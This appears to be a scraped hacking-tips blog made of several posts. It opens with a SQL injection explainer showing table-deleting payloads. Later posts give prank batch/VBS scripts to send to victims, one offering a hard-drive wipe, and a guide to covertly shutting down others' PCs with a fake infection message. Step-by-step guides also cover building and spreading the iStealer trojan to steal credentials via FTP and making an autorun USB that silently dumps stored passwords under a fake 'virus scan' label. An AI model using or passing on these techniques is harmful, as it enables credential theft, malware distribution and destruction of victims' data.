select id, firstname, lastname from authors where forename = 'evil'ex' and surname ='newman'
which the database attempts to run as
Incorrect syntax near al' as the database tried to execute evil.
A safe version of the above SQL statement could be coded in Java as:

String firstname = req.getParameter("firstname");
String lastname = req.getParameter("lastname");
// FIXME: do your own validation to detect attacks
String query = "SELECT id, firstname, lastname FROM authors WHERE forename = ? and surname = ?";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, firstname );
pstmt.setString( 2, lastname );
try
{
ResultSet results = pstmt.execute( );
}
Example 2
The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.

...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = "'"
+ userName + "' AND itemname = '"
+ ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...
The query that this code intends to execute follows:

SELECT * FROM items
WHERE owner =
AND itemname = ;
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string "name' OR 'a'='a" for itemName, then the query becomes the following:

SELECT * FROM items
WHERE owner = 'wiley'
AND itemname = 'name' OR 'a'='a';
The addition of the OR 'a'='a' condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:

SELECT * FROM items;
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.

Example 3
This example examines the effects of a different malicious value passed to the query constructed and executed in Example 1. If an attacker with the user name hacker enters the string "name'; DELETE FROM items; --" for itemName, then the query becomes the following two queries:

SELECT * FROM items
WHERE owner = 'hacker'
AND itemname = 'name';

DELETE FROM items;

--'
Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error in Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, in databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.

Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. In a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string "name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a", the following three valid statements will be created:

SELECT * FROM items
WHERE owner = 'hacker'
AND itemname = 'name';

DELETE FROM items;

SELECT * FROM items WHERE 'a'='a';
One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from a whitelist of safe values or identify and escape a blacklist of potentially malicious values. Whitelisting can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:

Target fields that are not quoted
Find ways to bypass the need for certain escaped meta-characters
Use stored procedures to hide the injected meta-characters
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.

Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.

procedure get_item (
itm_cv IN OUT ItmCurTyp,
usr in varchar2,
itm in varchar2)
is
open itm_cv for ' SELECT * FROM items WHERE ' ||
'owner = '''|| usr ||
' AND itemname = ''' || itm || '''';
end get_item;
Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.

How to remotely shutdown computers

2009-12-04T09:15:00.000-08:00

How to remotely shutdown computers

Things you should know before you begin:

-You NEED a computer
-You NEED a friend’s computer
-You NEED a pencil/pen and paper or a really good memory
-This only works if both computers are on the SAME network (i.e. computer labs at school)

HOW TO REMOTELY SHUTDOWN COMPUTERS

Before I start I want to make sure that anyone reading this guide understands that you MUST be on the same network as the computer you are trying to shutdown. This means that you can’t do it to a friend who lives next door, and most of the time it wont even work on to a computer in your house. However you may be able do this to computers on an office floor, or in a computer room/lab at school or the library.

Step 1:

First off, you will need to find the computer name of your targeted computer (this is the person you will be turning off).

To do this, you need to get to their computer somehow (sorry I don’t have a guide on sucking up or invisibility). I suggest you wait until they go to the restroom or look away for a second (you'll only need to be on their computer for about 15 seconds or less). After you get on their computer you need to click ‘start,’ then right click on ‘my computer.’ Here you will see a little list, of which at the bottom will be ‘properties.’ Click ‘properties.’

After clicking ‘properties,’ look on the ‘computer name’ tab for the ‘full computer name.’ WRITE IT DOWN (another smart idea to shorten the time you're on their computer is to take a picture of it using your cell phone). Generally it will be something with some numbers and the word ‘YOUR’ in it. That’s always the default computer name and remains unchanged for most computers.

Now you're all done on their computer. Make sure you put the screen back to how they left it so they don't think something is up.

Step 2:

Now go back to your computer. Click ‘start,’ then click ‘run’ (bottom left, under 'search').

After the ‘run’ screen opens it should look like this:

Now type ‘CMD’ into the box provided and click 'OK.' Now this window should pop up:

When it opens type ‘shutdown/i' and this window will open:

All you have to do now is click ‘add’ and type the name of the computer that you wrote down (or took a picture of) earlier (I suggest that you practice on yourself the first time then cancel the shutdown, see extra tips). You can also change the shutdown delay and even write a little message to the person you are shutting down in the 'comment' box. Try using a fun one like 'Your computer has been infected with an unknown device and needs to delete all open files.' That should really freak someone out who has a report or something important on the screen.

Extra tips:

If you wish to abort the shutdown during the timed delay, type ‘shutdown/a’ into the command prompt and it should abort the process.

Increase Broadband Speed Using Simple Tweak

2009-12-04T09:14:00.000-08:00

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

Cool Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

10 Most dangerous tricks to prank your friends

2009-12-04T09:12:00.000-08:00

ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---

1) Convey your friend a little message and shut down his / her computer:
Type :

Code:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
:
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

Code:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

Code:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

Code:

@echo off
title The end of the world
cd C:\
:menu
cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
Code:

echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Recover Lost windows xp admin password

2009-12-04T09:04:00.001-08:00

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Download::

Code:

http://ophcrack.sourceforge.net/

iStealer V4.0

2009-12-04T09:03:00.000-08:00

Note: This Tutoriol is not to teach people hacking but to aware them how they can save them from these kind of stuff :

Step 1)

Getting iStealer 4.0

Get it from here,

Code:

*Note: This file wasnt Uplaoded by me it was uploaded by D3N , The password for the file is sigma.

Download Link:http://adf.ly/BvT

Step 2)
Getting a FTP Host. I recommend using your own FTP Host or you can get one from >>Here <<

(NOTE) If you get the error : COMDLG32.OCX Is Missing Just Goto http://adf.ly/BvU
And Search COMDLG32.OCX And if you dont know how to register it on System32 Look for a tutorial.

Also, This program might be detected by ur AVG Any other Anti-Virus softwere so i suggest you turn it off.

Step 3)

When its done, Open it and it will say Password Put sigma

Extract the files to the location you want

When thats done Open "Loader" Or it wont work

Step 4)

Okay once iStealer v4 is up there should be a menu with different options.

Where it says host Put "ftp.drivehq.com" without quotes.

Where is says Login put your drivehq.com username.

Where is says password enter your drivehq.com password.

Where is says Dictionary You can leave it at / Or change it to your own location

Ok, Now your done you can choose to bind ur server with another application, song, document, picture etc! Just click "bind with another file" and choose what file you want to bind your server with.

Once you have done that you can decide whether or not you want to change the icon. Just click "Change icon then go to the folder where you extracted
iStealer v4, then open up icon pack then choose one of the icons there.

Once you have choosen you icon make sure you edit your settings Under "Options" You can Untick, Tick any you want, Dont want I recomend you tick them all apart from Encrypt Logs, Unless you know what ur doing

Before you Finish Click "Test FTP" To see if you entered the right info.
It it says "Can not connect to the FTP" you have entered something wrong E.G User, Pass
If it says "Works perfect!" It means its working.

Now click Build, Choose a location for it to save and a name Then ur done,
If you want you can open it to check if it works then goto ur FTP And see if ur info is there, If u test the server will Melt Which means it will diserpear Unless you unticked the option "Melt" If u ticked it and opened it you need to make a new Server
Step 5)

Spreading your server is easy Espessially If you have Binded it with a program, You can just say Its this program BLahblah I recommend Posting on newbie Forums, Not good forums Like well known, Post on youtube, Etc Etc.

If your asking Why did i use Adf.ly Its because Its just Link shortening , So when u click it click skip ad On top right.

Hack Passwords using an USB Pen Drive

2009-12-04T08:25:00.000-08:00

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables (.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to Hack Trial Version Softwares without Expiration

2009-12-04T08:18:00.000-08:00

Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.

Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.

How it works

* Open Time Stopper
* Browse and select .exe of required trial software
* Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
* Choose any time
* Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.

Size: 844 KB
Download Time Stopper: TimeStopper

Optimizing windows speed using windows registry editor - Get rid of unwanted programs on startup

2009-12-04T05:40:00.000-08:00

How to optimize the Windows performance by removing unwanted programs from startup using windows registry. Applicable to Windows XP, Vista, Windows 2000, windows 98 and windows server.

I will start hacking tips with a very useful and easy to do job. Most of us face this problem of computer slowing down; windows operating system takes ages to load when started, windows explorer hangs up and also how to find out whether your computer is infected.

Follow these steps:

1. Start and click on run in case of windows XP, Server, windows 98, and 2000 but in vista type directly in search box

2. Type Regedit in the run box to open registry editor

3. Go to file menu and click on export to create a back up of registry, save it on your drive other than your default windows directory.

Find out the current programs which are starting up with windows

After opening Registry editor click on HKEY_LOCAL_MACHINE

Software\

Microsoft\

Windows\

Current Version\

Run

You will see something like this on right hand pane in your registry editor

4. Now it’s time to get rid of the programs those slow down your operating system and possible may be a Trojan horse hiding in your hard disk.

Right click on any program to delete the entry, which you don’t want to be loaded during startup; personally I would only keep anti virus program entries.

Now you can repeat the same process with HKEY_LOCAL_USER entries and keep only Cftmon.exe for your computer sound to be working

After deleting the unwanted program registry entries, restart the system and feel the difference in speed. If you are confused about which entries to be deleted from registry editor or want to know whether it’s a Trojan or useful program

Essential Wireless Hacking Tools

2009-12-03T11:44:00.001-08:00

Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

(NetStumbler Screenshot)

Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.

(Kismet Screenshot)
Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

(Screenshot of Airsnort in Action)

CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.

(Cowpatty Options Screenshot)

ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

(Asleap Options Screenshot)
Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.

Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

(Screenshot of Ethereal in Action)

(Yahoo IM Session being sniffed in Ethereal)

The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.
Protecting Against These Tools

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.

NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.

Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption

Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).

Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.

ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.

Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

Cain & Abel v4.9.35 – Password Sniffer, Cracker and Brute-Forcing Tool

2009-11-21T12:15:00.000-08:00

It’s been quite a while since we’ve written about Cain & Abel, one of the most powerful tools for the Windows platform (back in 2007 here).

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.
Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.
Most recently added is the support for Windows 2008 Terminal Server in APR-RDP sniffer filter.

You can download Cain & Abel v4.9.35 here:

ca_setup.exe

Or read more here, the online user manual is here.